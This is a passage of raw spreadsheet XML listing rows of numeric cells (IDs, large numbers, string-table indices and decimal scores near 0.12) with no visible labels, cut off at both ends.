        <v>5.7039101E7</v>
      </c>
      <c r="C6219" s="2" t="s">
        <v>5922</v>
      </c>
      <c r="D6219" s="2">
        <v>1.0</v>
      </c>
      <c r="E6219" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6219" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="6220" ht="15.75" customHeight="1">
      <c r="A6220" s="1">
        <v>22032.0</v>
      </c>
      <c r="B6220" s="2">
        <v>3.0159552E7</v>
      </c>
      <c r="C6220" s="2" t="s">
        <v>5923</v>
      </c>
      <c r="D6220" s="2">
        <v>1.0</v>
      </c>
      <c r="E6220" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6220" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="6221" ht="15.75" customHeight="1">
      <c r="A6221" s="1">
        <v>26619.0</v>
      </c>
      <c r="B6221" s="2">
        <v>1.8041117E7</v>
      </c>
      <c r="C6221" s="2" t="s">
        <v>5924</v>
      </c>
      <c r="D6221" s="2">
        <v>1.0</v>
      </c>
      <c r="E6221" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6221" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="6222" ht="15.75" customHeight="1">
      <c r="A6222" s="1">
        <v>27256.0</v>
      </c>
      <c r="B6222" s="2">
        <v>2.1096355E7</v>
      </c>
      <c r="C6222" s="2" t="s">
        <v>5700</v>
      </c>
      <c r="D6222" s="2">
        <v>1.0</v>
      </c>
      <c r="E6222" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6222" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="6223" ht="15.75" customHeight="1">
      <c r="A6223" s="1">
        <v>29039.0</v>
      </c>
      <c r="B6223" s="2">
        <v>3.0159551E7</v>
      </c>
      <c r="C6223" s="2" t="s">
        <v>5923</v>
      </c>
      <c r="D6223" s="2">
        <v>1.0</v>
      </c>
      <c r="E6223" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6223" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="6224" ht="15.75" customHeight="1">
      <c r="A6224" s="1">
        <v>17726.0</v>
      </c>
      <c r="B6224" s="2">
        <v>5.0650398E7</v>
      </c>
      <c r="C6224" s="2" t="s">
        <v>5925</v>
      </c>
      <c r="D6224" s="2">
        <v>1.0</v>
      </c>
      <c r="E6224" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6224" s="2">
        <v>0.1231884057971014</v>
      </c>
    </row>
    <row r="6225" ht="15.75" customHeight="1">
      <c r="A6225" s="1">
        <v>33864.0</v>
      </c>
      <c r="B6225" s="2">
        <v>9061791.0</v>
      </c>
      <c r="C6225" s="2" t="s">
        <v>5926</v>
      </c>
      <c r="D6225" s="2">
        <v>1.0</v>
      </c>
      <c r="E6225" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6225" s="2">
        <v>0.1231481481481482</v>
      </c>
    </row>
    <row r="6226" ht="15.75" customHeight="1">
      <c r="A6226" s="1">
        <v>20628.0</v>
      </c>
      <c r="B6226" s="2">
        <v>1.4102065E7</v>
      </c>
      <c r="C6226" s="2" t="s">
        <v>5927</v>
      </c>
      <c r="D6226" s="2">
        <v>1.0</v>
      </c>
      <c r="E6226" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6226" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="6227" ht="15.75" customHeight="1">
      <c r="A6227" s="1">
        <v>22762.0</v>
      </c>
      <c r="B6227" s="2">
        <v>4.4788137E7</v>
      </c>
      <c r="C6227" s="2" t="s">
        <v>5928</v>
      </c>
      <c r="D6227" s="2">
        <v>1.0</v>
      </c>
      <c r="E6227" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6227" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="6228" ht="15.75" customHeight="1">
      <c r="A6228" s="1">
        <v>24499.0</v>
      </c>
      <c r="B6228" s="2">
        <v>1.1090924E7</v>
      </c>
      <c r="C6228" s="2" t="s">
        <v>5929</v>
      </c>
      <c r="D6228" s="2">
        <v>1.0</v>
      </c>
      <c r="E6228" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6228" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="6229" ht="15.75" customHeight="1">
      <c r="A6229" s="1">
        <v>24830.0</v>
      </c>
      <c r="B6229" s="2">
        <v>1.2125476E7</v>
      </c>
      <c r="C6229" s="2" t="s">
        <v>5930</v>
      </c>
      <c r="D6229" s="2">
        <v>1.0</v>
      </c>
      <c r="E6229" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6229" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="6230" ht="15.75" customHeight="1">
      <c r="A6230" s="1">
        <v>29626.0</v>
      </c>
      <c r="B6230" s="2">
        <v>3.3680775E7</v>
      </c>
      <c r="C6230" s="2" t="s">
        <v>5931</v>
      </c>
      <c r="D6230" s="2">
        <v>1.0</v>
      </c>
      <c r="E6230" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6230" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="6231" ht="15.75" customHeight="1">
      <c r="A6231" s="1">
        <v>32632.0</v>
      </c>
      <c r="B6231" s="2">
        <v>5854148.0</v>
      </c>
      <c r="C6231" s="2" t="s">
        <v>5932</v>
      </c>
      <c r="D6231" s="2">
        <v>1.0</v>
      </c>
      <c r="E6231" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6231" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="6232" ht="15.75" customHeight="1">
      <c r="A6232" s="1">
        <v>24938.0</v>
      </c>
      <c r="B6232" s="2">
        <v>1.2486199E7</v>
      </c>
      <c r="C6232" s="2" t="s">
        <v>5933</v>
      </c>
      <c r="D6232" s="2">
        <v>1.0</v>
      </c>
      <c r="E6232" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6232" s="2">
        <v>0.1229508196721312</v>
      </c>
    </row>
    <row r="6233" ht="15.75" customHeight="1">
      <c r="A6233" s="1">
        <v>33094.0</v>
      </c>
      <c r="B6233" s="2">
        <v>6955387.0</v>
      </c>
      <c r="C6233" s="2" t="s">
        <v>5934</v>
      </c>
      <c r="D6233" s="2">
        <v>1.0</v>
      </c>
      <c r="E6233" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6233" s="2">
        <v>0.1229508196721312</v>
      </c>
    </row>
    <row r="6234" ht="15.75" customHeight="1">
      <c r="A6234" s="1">
        <v>17956.0</v>
      </c>
      <c r="B6234" s="2">
        <v>5.1291709E7</v>
      </c>
      <c r="C6234" s="2" t="s">
        <v>5935</v>
      </c>
      <c r="D6234" s="2">
        <v>1.0</v>
      </c>
      <c r="E6234" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6234" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="6235" ht="15.75" customHeight="1">
      <c r="A6235" s="1">
        <v>22491.0</v>
      </c>
      <c r="B6235" s="2">
        <v>3.7075981E7</v>
      </c>
      <c r="C6235" s="2" t="s">
        <v>5936</v>
      </c>
      <c r="D6235" s="2">
        <v>1.0</v>
      </c>
      <c r="E6235" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6235" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="6236" ht="15.75" customHeight="1">
      <c r="A6236" s="1">
        <v>28019.0</v>
      </c>
      <c r="B6236" s="2">
        <v>2.4373821E7</v>
      </c>
      <c r="C6236" s="2" t="s">
        <v>5937</v>
      </c>
      <c r="D6236" s="2">
        <v>1.0</v>
      </c>
      <c r="E6236" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6236" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="6237" ht="15.75" customHeight="1">
      <c r="A6237" s="1">
        <v>29534.0</v>
      </c>
      <c r="B6237" s="2">
        <v>3.282336E7</v>
      </c>
      <c r="C6237" s="2" t="s">
        <v>5938</v>
      </c>
      <c r="D6237" s="2">
        <v>1.0</v>
      </c>
      <c r="E6237" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6237" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="6238" ht="15.75" customHeight="1">
      <c r="A6238" s="1">
        <v>32961.0</v>
      </c>
      <c r="B6238" s="2">
        <v>6514736.0</v>
      </c>
      <c r="C6238" s="2" t="s">
        <v>5939</v>
      </c>
      <c r="D6238" s="2">
        <v>1.0</v>
      </c>
      <c r="E6238" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6238" s="2">
        <v>0.1227598566308244</v>
      </c>
    </row>
    <row r="6239" ht="15.75" customHeight="1">
      <c r="A6239" s="1">
        <v>21783.0</v>
      </c>
      <c r="B6239" s="2">
        <v>2.6516653E7</v>
      </c>
      <c r="C6239" s="2" t="s">
        <v>5940</v>
      </c>
      <c r="D6239" s="2">
        <v>1.0</v>
      </c>
      <c r="E6239" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6239" s="2">
        <v>0.1225749559082893</v>
      </c>
    </row>
    <row r="6240" ht="15.75" customHeight="1">
      <c r="A6240" s="1">
        <v>33444.0</v>
      </c>
      <c r="B6240" s="2">
        <v>7859152.0</v>
      </c>
      <c r="C6240" s="2" t="s">
        <v>5941</v>
      </c>
      <c r="D6240" s="2">
        <v>1.0</v>
      </c>
      <c r="E6240" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6240" s="2">
        <v>0.1225749559082893</v>
      </c>
    </row>
    <row r="6241" ht="15.75" customHeight="1">
      <c r="A6241" s="1">
        <v>30543.0</v>
      </c>
      <c r="B6241" s="2">
        <v>4.0578915E7</v>
      </c>
      <c r="C6241" s="2" t="s">
        <v>5942</v>
      </c>
      <c r="D6241" s="2">
        <v>1.0</v>
      </c>
      <c r="E6241" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6241" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="6242" ht="15.75" customHeight="1">
      <c r="A6242" s="1">
        <v>23811.0</v>
      </c>
      <c r="B6242" s="2">
        <v>7944160.0</v>
      </c>
      <c r="C6242" s="2" t="s">
        <v>5943</v>
      </c>
      <c r="D6242" s="2">
        <v>1.0</v>
      </c>
      <c r="E6242" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6242" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="6243" ht="15.75" customHeight="1">
      <c r="A6243" s="1">
        <v>23913.0</v>
      </c>
      <c r="B6243" s="2">
        <v>8526731.0</v>
      </c>
      <c r="C6243" s="2" t="s">
        <v>5944</v>
      </c>
      <c r="D6243" s="2">
        <v>1.0</v>
      </c>
      <c r="E6243" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6243" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="6244" ht="15.75" customHeight="1">
      <c r="A6244" s="1">
        <v>26432.0</v>
      </c>
      <c r="B6244" s="2">
        <v>1.7175236E7</v>
      </c>
      <c r="C6244" s="2" t="s">
        <v>5945</v>
      </c>
      <c r="D6244" s="2">
        <v>1.0</v>
      </c>
      <c r="E6244" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6244" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="6245" ht="15.75" customHeight="1">
      <c r="A6245" s="1">
        <v>26587.0</v>
      </c>
      <c r="B6245" s="2">
        <v>1.7943838E7</v>
      </c>
      <c r="C6245" s="2" t="s">
        <v>5712</v>
      </c>
      <c r="D6245" s="2">
        <v>1.0</v>
      </c>
      <c r="E6245" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6245" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="6246" ht="15.75" customHeight="1">
      <c r="A6246" s="1">
        <v>31307.0</v>
      </c>
      <c r="B6246" s="2">
        <v>4967863.0</v>
      </c>
      <c r="C6246" s="2" t="s">
        <v>5946</v>
      </c>
      <c r="D6246" s="2">
        <v>1.0</v>
      </c>
      <c r="E6246" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6246" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="6247" ht="15.75" customHeight="1">
      <c r="A6247" s="1">
        <v>10812.0</v>
      </c>
      <c r="B6247" s="2">
        <v>1.585936E7</v>
      </c>
      <c r="C6247" s="2" t="s">
        <v>5947</v>
      </c>
      <c r="D6247" s="2">
        <v>1.0</v>
      </c>
      <c r="E6247" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6247" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="6248" ht="15.75" customHeight="1">
      <c r="A6248" s="1">
        <v>14234.0</v>
      </c>
      <c r="B6248" s="2">
        <v>3.8304434E7</v>
      </c>
      <c r="C6248" s="2" t="s">
        <v>5948</v>
      </c>
      <c r="D6248" s="2">
        <v>1.0</v>
      </c>
      <c r="E6248" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6248" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="6249" ht="15.75" customHeight="1">
      <c r="A6249" s="1">
        <v>21235.0</v>
      </c>
      <c r="B6249" s="2">
        <v>1.97144E7</v>
      </c>
      <c r="C6249" s="2" t="s">
        <v>5737</v>
      </c>
      <c r="D6249" s="2">
        <v>1.0</v>
      </c>
      <c r="E6249" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6249" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="6250" ht="15.75" customHeight="1">
      <c r="A6250" s="1">
        <v>22557.0</v>
      </c>
      <c r="B6250" s="2">
        <v>3.8302005E7</v>
      </c>
      <c r="C6250" s="2" t="s">
        <v>5949</v>
      </c>
      <c r="D6250" s="2">
        <v>1.0</v>
      </c>
      <c r="E6250" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6250" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="6251" ht="15.75" customHeight="1">
      <c r="A6251" s="1">
        <v>23785.0</v>
      </c>
      <c r="B6251" s="2">
        <v>7686752.0</v>
      </c>
      <c r="C6251" s="2" t="s">
        <v>5950</v>
      </c>
      <c r="D6251" s="2">
        <v>1.0</v>
      </c>
      <c r="E6251" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6251" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="6252" ht="15.75" customHeight="1">
      <c r="A6252" s="1">
        <v>29381.0</v>
      </c>
      <c r="B6252" s="2">
        <v>3.1822123E7</v>
      </c>
      <c r="C6252" s="2" t="s">
        <v>5951</v>
      </c>
      <c r="D6252" s="2">
        <v>1.0</v>
      </c>
      <c r="E6252" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6252" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="6253" ht="15.75" customHeight="1">
      <c r="A6253" s="1">
        <v>29591.0</v>
      </c>
      <c r="B6253" s="2">
        <v>3.3523288E7</v>
      </c>
      <c r="C6253" s="2" t="s">
        <v>5952</v>
      </c>
      <c r="D6253" s="2">
        <v>1.0</v>
      </c>
      <c r="E6253" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6253" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="6254" ht="15.75" customHeight="1">
      <c r="A6254" s="1">
        <v>30968.0</v>
      </c>
      <c r="B6254" s="2">
        <v>4.7481604E7</v>
      </c>
      <c r="C6254" s="2" t="s">
        <v>5953</v>
      </c>
      <c r="D6254" s="2">
        <v>1.0</v>
      </c>
      <c r="E6254" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6254" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="6255" ht="15.75" customHeight="1">
      <c r="A6255" s="1">
        <v>31035.0</v>
      </c>
      <c r="B6255" s="2">
        <v>4.7813759E7</v>
      </c>
      <c r="C6255" s="2" t="s">
        <v>5954</v>
      </c>
      <c r="D6255" s="2">
        <v>1.0</v>
      </c>
      <c r="E6255" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6255" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="6256" ht="15.75" customHeight="1">
      <c r="A6256" s="1">
        <v>31657.0</v>
      </c>
      <c r="B6256" s="2">
        <v>5.167933E7</v>
      </c>
      <c r="C6256" s="2" t="s">
        <v>5955</v>
      </c>
      <c r="D6256" s="2">
        <v>1.0</v>
      </c>
      <c r="E6256" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6256" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="6257" ht="15.75" customHeight="1">
      <c r="A6257" s="1">
        <v>33893.0</v>
      </c>
      <c r="B6257" s="2">
        <v>9190659.0</v>
      </c>
      <c r="C6257" s="2" t="s">
        <v>5956</v>
      </c>
      <c r="D6257" s="2">
        <v>1.0</v>
      </c>
      <c r="E6257" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6257" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="6258" ht="15.75" customHeight="1">
      <c r="A6258" s="1">
        <v>25341.0</v>
      </c>
      <c r="B6258" s="2">
        <v>1.3538359E7</v>
      </c>
      <c r="C6258" s="2" t="s">
        <v>5957</v>
      </c>
      <c r="D6258" s="2">
        <v>1.0</v>
      </c>
      <c r="E6258" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6258" s="2">
        <v>0.1218905472636816</v>
      </c>
    </row>
    <row r="6259" ht="15.75" customHeight="1">
      <c r="A6259" s="1">
        <v>21621.0</v>
      </c>
      <c r="B6259" s="2">
        <v>2.4574241E7</v>
      </c>
      <c r="C6259" s="2" t="s">
        <v>5958</v>
      </c>
      <c r="D6259" s="2">
        <v>1.0</v>
      </c>
      <c r="E6259" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6259" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="6260" ht="15.75" customHeight="1">
      <c r="A6260" s="1">
        <v>25442.0</v>
      </c>
      <c r="B6260" s="2">
        <v>1.3879456E7</v>
      </c>
      <c r="C6260" s="2" t="s">
        <v>5623</v>
      </c>
      <c r="D6260" s="2">
        <v>1.0</v>
      </c>
      <c r="E6260" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6260" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="6261" ht="15.75" customHeight="1">
      <c r="A6261" s="1">
        <v>28794.0</v>
      </c>
      <c r="B6261" s="2">
        <v>2.8542073E7</v>
      </c>
      <c r="C6261" s="2" t="s">
        <v>5959</v>
      </c>
      <c r="D6261" s="2">
        <v>1.0</v>
      </c>
      <c r="E6261" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6261" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="6262" ht="15.75" customHeight="1">
      <c r="A6262" s="1">
        <v>33946.0</v>
      </c>
      <c r="B6262" s="2">
        <v>9298531.0</v>
      </c>
      <c r="C6262" s="2" t="s">
        <v>5960</v>
      </c>
      <c r="D6262" s="2">
        <v>1.0</v>
      </c>
      <c r="E6262" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6262" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="6263" ht="15.75" customHeight="1">
      <c r="A6263" s="1">
        <v>20770.0</v>
      </c>
      <c r="B6263" s="2">
        <v>1.4962833E7</v>
      </c>
      <c r="C6263" s="2" t="s">
        <v>5961</v>
      </c>
      <c r="D6263" s="2">
        <v>1.0</v>
      </c>
      <c r="E6263" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6263" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="6264" ht="15.75" customHeight="1">
      <c r="A6264" s="1">
        <v>24162.0</v>
      </c>
      <c r="B6264" s="2">
        <v>1.0149511E7</v>
      </c>
      <c r="C6264" s="2" t="s">
        <v>5962</v>
      </c>
      <c r="D6264" s="2">
        <v>1.0</v>
      </c>
      <c r="E6264" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6264" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="6265" ht="15.75" customHeight="1">
      <c r="A6265" s="1">
        <v>28764.0</v>
      </c>
      <c r="B6265" s="2">
        <v>2.820699E7</v>
      </c>
      <c r="C6265" s="2" t="s">
        <v>5798</v>
      </c>
      <c r="D6265" s="2">
        <v>1.0</v>
      </c>
      <c r="E6265" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6265" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="6266" ht="15.75" customHeight="1">
      <c r="A6266" s="1">
        <v>31713.0</v>
      </c>
      <c r="B6266" s="2">
        <v>5210923.0</v>
      </c>
      <c r="C6266" s="2" t="s">
        <v>5963</v>
      </c>
      <c r="D6266" s="2">
        <v>1.0</v>
      </c>
      <c r="E6266" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6266" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="6267" ht="15.75" customHeight="1">
      <c r="A6267" s="1">
        <v>20735.0</v>
      </c>
      <c r="B6267" s="2">
        <v>1.4740676E7</v>
      </c>
      <c r="C6267" s="2" t="s">
        <v>5964</v>
      </c>
      <c r="D6267" s="2">
        <v>1.0</v>
      </c>
      <c r="E6267" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6267" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="6268" ht="15.75" customHeight="1">
      <c r="A6268" s="1">
        <v>21579.0</v>
      </c>
      <c r="B6268" s="2">
        <v>2.3856113E7</v>
      </c>
      <c r="C6268" s="2" t="s">
        <v>5965</v>
      </c>
      <c r="D6268" s="2">
        <v>1.0</v>
      </c>
      <c r="E6268" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6268" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="6269" ht="15.75" customHeight="1">
      <c r="A6269" s="1">
        <v>25362.0</v>
      </c>
      <c r="B6269" s="2">
        <v>1.3592787E7</v>
      </c>
      <c r="C6269" s="2" t="s">
        <v>5966</v>
      </c>
      <c r="D6269" s="2">
        <v>1.0</v>
      </c>
      <c r="E6269" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6269" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="6270" ht="15.75" customHeight="1">
      <c r="A6270" s="1">
        <v>25934.0</v>
      </c>
      <c r="B6270" s="2">
        <v>1.5202921E7</v>
      </c>
      <c r="C6270" s="2" t="s">
        <v>5967</v>
      </c>
      <c r="D6270" s="2">
        <v>1.0</v>
      </c>
      <c r="E6270" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6270" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="6271" ht="15.75" customHeight="1">
      <c r="A6271" s="1">
        <v>28908.0</v>
      </c>
      <c r="B6271" s="2">
        <v>2.9416224E7</v>
      </c>
      <c r="C6271" s="2" t="s">
        <v>5968</v>
      </c>
      <c r="D6271" s="2">
        <v>1.0</v>
      </c>
      <c r="E6271" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6271" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="6272" ht="15.75" customHeight="1">
      <c r="A6272" s="1">
        <v>28992.0</v>
      </c>
      <c r="B6272" s="2">
        <v>2.9863736E7</v>
      </c>
      <c r="C6272" s="2" t="s">
        <v>5969</v>
      </c>
      <c r="D6272" s="2">
        <v>1.0</v>
      </c>
      <c r="E6272" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6272" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="6273" ht="15.75" customHeight="1">
      <c r="A6273" s="1">
        <v>29666.0</v>
      </c>
      <c r="B6273" s="2">
        <v>3.3952722E7</v>
      </c>
      <c r="C6273" s="2" t="s">
        <v>5970</v>
      </c>
      <c r="D6273" s="2">
        <v>1.0</v>
      </c>
      <c r="E6273" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6273" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="6274" ht="15.75" customHeight="1">
      <c r="A6274" s="1">
        <v>30296.0</v>
      </c>
      <c r="B6274" s="2">
        <v>3.7769569E7</v>
      </c>
      <c r="C6274" s="2" t="s">
        <v>5971</v>
      </c>
      <c r="D6274" s="2">
        <v>1.0</v>
      </c>
      <c r="E6274" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6274" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="6275" ht="15.75" customHeight="1">
      <c r="A6275" s="1">
        <v>31578.0</v>
      </c>
      <c r="B6275" s="2">
        <v>5126925.0</v>
      </c>
      <c r="C6275" s="2" t="s">
        <v>5972</v>
      </c>
      <c r="D6275" s="2">
        <v>1.0</v>
      </c>
      <c r="E6275" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6275" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="6276" ht="15.75" customHeight="1">
      <c r="A6276" s="1">
        <v>32186.0</v>
      </c>
      <c r="B6276" s="2">
        <v>5.4687101E7</v>
      </c>
      <c r="C6276" s="2" t="s">
        <v>5973</v>
      </c>
      <c r="D6276" s="2">
        <v>1.0</v>
      </c>
      <c r="E6276" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6276" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="6277" ht="15.75" customHeight="1">
      <c r="A6277" s="1">
        <v>33202.0</v>
      </c>
      <c r="B6277" s="2">
        <v>7165334.0</v>
      </c>
      <c r="C6277" s="2" t="s">
        <v>5974</v>
      </c>
      <c r="D6277" s="2">
        <v>1.0</v>
      </c>
      <c r="E6277" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6277" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="6278" ht="15.75" customHeight="1">
      <c r="A6278" s="1">
        <v>33226.0</v>
      </c>
      <c r="B6278" s="2">
        <v>7270758.0</v>
      </c>
      <c r="C6278" s="2" t="s">
        <v>5975</v>
      </c>
      <c r="D6278" s="2">
        <v>1.0</v>
      </c>
      <c r="E6278" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6278" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="6279" ht="15.75" customHeight="1">
      <c r="A6279" s="1">
        <v>16254.0</v>
      </c>
      <c r="B6279" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C6279" s="2" t="s">
        <v>5976</v>
      </c>
      <c r="D6279" s="2">
        <v>1.0</v>
      </c>
      <c r="E6279" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6279" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="6280" ht="15.75" customHeight="1">
      <c r="A6280" s="1">
        <v>28979.0</v>
      </c>
      <c r="B6280" s="2">
        <v>2.9816252E7</v>
      </c>
      <c r="C6280" s="2" t="s">
        <v>5977</v>
      </c>
      <c r="D6280" s="2">
        <v>1.0</v>
      </c>
      <c r="E6280" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6280" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="6281" ht="15.75" customHeight="1">
      <c r="A6281" s="1">
        <v>30313.0</v>
      </c>
      <c r="B6281" s="2">
        <v>3.8011297E7</v>
      </c>
      <c r="C6281" s="2" t="s">
        <v>5978</v>
      </c>
      <c r="D6281" s="2">
        <v>1.0</v>
      </c>
      <c r="E6281" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6281" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="6282" ht="15.75" customHeight="1">
      <c r="A6282" s="1">
        <v>33443.0</v>
      </c>
      <c r="B6282" s="2">
        <v>7852362.0</v>
      </c>
      <c r="C6282" s="2" t="s">
        <v>5979</v>
      </c>
      <c r="D6282" s="2">
        <v>1.0</v>
      </c>
      <c r="E6282" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6282" s="2">
        <v>0.121647509578544</v>
      </c>
    </row>
    <row r="6283" ht="15.75" customHeight="1">
      <c r="A6283" s="1">
        <v>4854.0</v>
      </c>
      <c r="B6283" s="2">
        <v>4.3758319E7</v>
      </c>
      <c r="C6283" s="2" t="s">
        <v>5980</v>
      </c>
      <c r="D6283" s="2">
        <v>1.0</v>
      </c>
      <c r="E6283" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6283" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6284" ht="15.75" customHeight="1">
      <c r="A6284" s="1">
        <v>13073.0</v>
      </c>
      <c r="B6284" s="2">
        <v>3.3337086E7</v>
      </c>
      <c r="C6284" s="2" t="s">
        <v>5981</v>
      </c>
      <c r="D6284" s="2">
        <v>1.0</v>
      </c>
      <c r="E6284" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6284" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6285" ht="15.75" customHeight="1">
      <c r="A6285" s="1">
        <v>16540.0</v>
      </c>
      <c r="B6285" s="2">
        <v>4.6777727E7</v>
      </c>
      <c r="C6285" s="2" t="s">
        <v>5982</v>
      </c>
      <c r="D6285" s="2">
        <v>1.0</v>
      </c>
      <c r="E6285" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6285" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6286" ht="15.75" customHeight="1">
      <c r="A6286" s="1">
        <v>17569.0</v>
      </c>
      <c r="B6286" s="2">
        <v>5.0261813E7</v>
      </c>
